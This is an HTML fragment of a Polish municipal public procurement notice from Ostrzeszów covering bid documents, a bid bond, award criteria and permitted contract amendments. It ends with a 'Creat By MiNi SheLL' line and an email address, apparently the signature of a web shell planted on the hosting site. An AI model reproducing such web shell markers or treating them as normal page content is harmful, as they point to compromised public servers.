<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe dokumenty, które wykonawca winien dołączyć do oferty
Formularz ofertowy wraz z zestawieniem kosztów (wg wzoru zał. nr 1 do siwz) 
(Zaleca się aby formularz ofertowy został przedstawiony w ofercie wykonawcy na początku oferty                na jej pierwszej i kolejnej stronie).
Pełnomocnictwo do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i w zawarciu umowy o ile nie wynikają z przepisów prawa lub innych dokumentów (we właściwym rejestrze lub ewidencji działalności gospodarczej). Pełnomocnictwo-a winno być złożone w oryginale lub w formie odpisu-kopii potwierdzonej notarialnie.
Pełnomocnictwo ustanawiające Pełnomocnika w przypadku gdy wykonawcy wspólnie ubiegają się                  o udzielenie zamówienia publicznego do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. 
Pełnomocnictwo-a winno być złożone w oryginale lub w formie odpisu-kopii potwierdzonej notarialnie.
Potwierdzenie wniesienia wadium w wysokości 200.000,00 zł. (dwieście tysięcy złotych)
W przypadku wniesienia wadium w formie
- pieniądza - do oferty należy załączyć oryginał lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu - dowodu wpłaty na wskazane konto zamawiającego
- niepieniężnej - do oferty należy załączyć, 
oryginał tego zabezpieczenia w formie dopuszczonej przepisami ustawy Pzp przy czym zaleca się aby dokument ten nie był trwale połączony z ofertą
oraz 
kserokopię tego dokumentu wniesionego zabezpieczenia w formie niepieniężnej potwierdzonej za zgodność z oryginałem, trwale połączonej z ofertą wykonawcy.
Zobowiązania podmiotów oddających do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia na podstawie art. 26 ust. 2b ustawy Pzp (jeśli dotyczy) (wg wzoru zał. nr 9 do siwz) 
Na podstawie art. 36 b ustawy Pzp, zamawiający żąda wykazu części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom lub podania przez wykonawcę nazw firm podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1   (jeśli dotyczy) (wg wzoru zał. nr 8 do siwz)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja i rękojmia na cały przedmiot zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne dla Stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, wzór umowy oraz możliwości dokonania istotnych zmian treści umowy w trakcie realizacji przedmiotu zamówienia w stosunku do treści oferty. 
Umowa zostanie podpisana według treści i warunków ustalonych we wzorze stanowiącym                          (zał. nr 11 do siwz); wraz z jej załącznikami;
Umowa zostanie zawarta w formie pisemnej w terminie wskazanym w art. 94 ust. 1 pkt 2 oraz art. 94 ust. 2 pkt 1 lit. a oraz pkt 3 lit. a ustawy Prawo zamówień publicznych. O miejscu i terminie podpisania umowy Zamawiający powiadomi pisemnie.
Zamawiający dopuszcza na podstawie art. 144 ust. 1 ustawy PZP istotne zmiany treści umowy                     w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy: 
W zakresie zmiany kluczowego personelu wykonawcy odpowiedzialnego za realizację przedmiotu zamówienia; tj. kierownika robót z uprawnieniami budowlanymi w specjalności robót ogólnobudowlanych w zakresie wykonawstwa, która będzie pełniła obowiązki kierownika budowy; 
Zmiana ta może wynikać z inicjatywy Wykonawcy lub Zamawiającego w każdym uzasadnionym przypadku; Wymagana jest wcześniejsza pisemna zgoda Zamawiającego, który dokonuje                                 akceptacji tego specjalisty w oparciu o przyjęte warunki  określone w siwz;                                                                                                       W zakresie dokonanej zmiany wymagany jest Aneks do Umowy;
W zakresie zmiany przepisów prawa w trakcie realizacji przedmiotu zamówienia;                             Dotyczyć to może np. zmiany stawki podatku VAT lub innych przepisów prawa                                 na które Zamawiający i Wykonawca nie mają wpływu w trakcie realizacji przedmiotu zamówienia;  W zakresie dokonanej zmiany wymagany jest Aneks do Umowy;
W zakresie zmian związanych z wynagrodzeniem Wykonawcy za wykonanie przedmiotu umowy; 
Wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone lub zwiększone,                jeżeli w trakcie realizacji przedmiotu umowy, określone roboty budowlane, materiały, urządzenia lub inne składowe wchodzące w pierwotny zakres umowny - nie zostały wykonane lub zostały wykonane w zwiększonym zakresie lub zaniechano ich realizacji, bądź wykonano roboty zamienne powodujące pomniejszenie lub zwiększenie wartości umownej; Zmiana wynagrodzenia określonego w umowie o realizację zamówienia publicznego - zostanie określona w oparciu o złożony kosztorys ofertowy/zamienny/powykonawczy na podstawie wskaźników cenotwórczych w nim zawartych; Wytyczne w zakresie sporządzenia kosztorysu określają przepisy Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (DZ.U. nr 130 poz. 1389) dla kosztorysów inwestorskich; 
Rozliczenie wykonanego przedmiotu umowy będzie się odbywało na podstawie złożonego kosztorysu ofertowego/zamiennego/powykonawczego, który zostanie sprawdzony przez inspektora nadzoru budowlanego i przedstawiciela zamawiającego - zatwierdzających końcową wartość przedmiotu umowy; Inspektor nadzoru budowlanego i przedstawiciel Zamawiającego dokonają stosownych zmian;  W przypadku wykonania robót/pozycji zamiennych powodujących obniżenie lub zwiększenie ceny/lub zachowanie takiej samej ceny wykonania przedmiotu umowy. Wykonawca zobowiązany będzie do jego wykonania i wskazania różnic w stosunku do swojego kosztorysu ofertowego;
W zakresie dokonanej zmiany nie jest wymagany Aneks do Umowy;
Wynagrodzenie Wykonawcy zostanie odpowiednio powiększone, o różnicę pomiędzy wartością przedmiotu umowy a dodatkowymi robotami budowlanymi zleconymi przez Zamawiającego powodującymi wzrost wynagrodzenia umownego;
Zamawiający na podstawie art. 67 ust. 1 pkt 5 ustawy PZP przewiduje możliwość udzielenia dotychczasowemu wykonawcy robót budowlanych - zamówień dodatkowych, nieobjętych zamówieniem podstawowym i nieprzekraczającym łącznie 5% wartości realizowanego zamówienia, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów lub
wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego. 
Zmiana wynagrodzenia większego niż określono w umowie o realizację zamówienia publicznego - zostanie określona w oparciu o złożony kosztorys ofertowy na roboty dodatkowe metodą szczegółową na podstawie wskaźników cenotwórczych podanych             w złożonym kosztorysie ofertowym przed podpisaniem umowy; Wytyczne w zakresie sporządzenia kosztorysu określają przepisy Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. (DZ.U. nr 130 poz. 1389) dla kosztorysów inwestorskich; 
W zakresie dokonanej zmiany jest wymagany Aneks do Umowy;
W zakresie konieczności zmiany podwykonawcy lub podmiotu udostępniającego swoje zasoby             w zakresie określonym w ofercie wykonawcy; 
Sytuacja ta może mieć miejsce z konieczności zmiany podwykonawcy, którego Wykonawca wyznaczył do realizacji części zamówienia bądź podmiotu który udostępnił swoje zasoby w zakresie określonym w ofercie na potwierdzenie spełnienia warunków udziału w postępowaniu;
Wymagana jest pisemna zgoda zamawiającego na zmianę podwykonawcy po udokumentowaniu warunków niepodlegania wykluczeniu z udziału w postępowaniu. W przypadku podmiotów które udostępniły zasoby w zakresie określonym w warunkach udziału w postępowaniu, odpowiedniego dokumentu potwierdzającego udostępnienie zasobów;
W zakresie dokonanej zmiany podwykonawców wymagany jest Aneks do Umowy;
W zakresie dokonanej zmiany podmiotów które udostępniły zasoby nie jest wymagany Aneks do Umowy tyko stosowne dokumenty określone w siwz; 
W zakresie konieczności zmiany sposobu realizacji przedmiotu zamówienia.      Na wniosek zamawiającego lub wykonawcy za pisemną zgodą zmawiającego, dopuszcza się zmiany sposobu realizacji przedmiotu zamówienia w następujących okolicznościach:
a)	konieczności realizacji przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych lub technologicznych niż wskazane w dokumentacji technicznej lub specyfikacji technicznej wykonania i odbioru robót, jeśli przyjęte w tych dokumentach rozwiązania groziłyby niewykonaniem lub nieprawidłowym zamówienia;
b)	konieczności realizacji przedmiotu zamówienia przy zastosowaniu innych rozwiązań technicznych lub technologicznych ze względu na zmiany obowiązującego prawa;
c)	innych niż przyjęte w specyfikacji technicznej wykonania i odbioru robót i dokumentacji technicznej - warunków terenowych w szczególności istnienia niezinwentaryzowanej infrastruktury podziemnej oraz warunków posadowienia obiektu (warunków geologicznych) w terenie, uniemożliwiających realizację zamówienia wg przyjętych założeń technologicznych;
W zakresie dokonanej zmiany sposobu realizacji przedmiotu zamówienia nie jest wymagany Aneks do Umowy; 
W zakresie konieczności zmiany wysokości wynagrodzenia za przedmiot zamówienia.                               Na wniosek zamawiającego lub wykonawcy za pisemną zgodą zamawiającego, dopuszcza się zmianę wysokości wynagrodzenia polegającej na rezygnacji z wykonania części robót  przedmiotu zamówienia w granicach zgodności z dokumentacją techniczną i interesem prawnym zamawiającego.
W zakresie dokonanej zmiany wysokości wynagrodzenia za przedmiot zamówienia nie jest wymagany Aneks do Umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrzeszow.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.ostrzeszow.nowoczesnagmina.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2016 godzina 12:00, miejsce: Zakład Obsługi Placówek Oświatowych, ul. Zamkowa 31, 63 - 500 Ostrzeszów pok. 79. III p. UMiG Ostrzeszów..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com